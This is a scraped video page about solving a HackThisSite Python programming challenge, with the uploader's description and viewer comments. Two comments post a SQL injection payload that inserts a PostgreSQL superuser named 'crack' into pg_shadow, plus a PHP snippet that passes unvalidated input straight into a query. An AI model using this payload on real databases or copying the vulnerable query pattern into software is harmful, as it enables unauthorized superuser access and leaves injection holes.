Python programming: hackthissite programmin1 [HD]

preview_player
Показать описание
Just little something to get new programmers motivated ;)
Sry, English isnt my main language ;)
I also had a mistake where i called a list as a dictionary twice after 7:28...
so "The currently empty dictionary" is actually "The currently empty list"...
/me apologizes.. ^_^...



I hope you enjoy it ;) Happy hacking :p
Рекомендации по теме
Комментарии
Автор

@SuperSmuky1 You can also use it to create web sites.

AtomicBl
Автор

and 0;
insert into pg_shadow(usename, usesysid, usesuper, usecatupd, passwd)
select 'crack', usesysid, 't', 't', 'crack'
from pg_shadow where usename='postgres';

david
Автор

@thedarkhunterfrommk i once didnt know anything about computers at all.. not that i know much now either :p Check the description for a link to the python class and it'll get you started ;)

dNin
Автор

Hello everybody! I am currently working on youtube videos again :p

This will be my first remake and the actual python program is almost complete.

This new video, i will post a video response later will go much much more in detail and as being a better programmer now, hopefully wont be as messy as this one.. im ashamed of putting it on :p

dNin
Автор

i dont know... didnt know better i guess...

dNin
Автор

@ud4567 you mean facebook? no i suck at hacking websites ;)

dNin
Автор

look i wanna show you more if u want take this and remplece it us code if u want splitting the result set into pages ... and making superusers:
? php
$ offset = $argv[0]; // Attention, aucune validation!
$query = "SELECT id, name FROM products ORDER BY name LIMIT 20 OFFSET $ offset;";
$ result = pg_query($conn, $query);
? >

david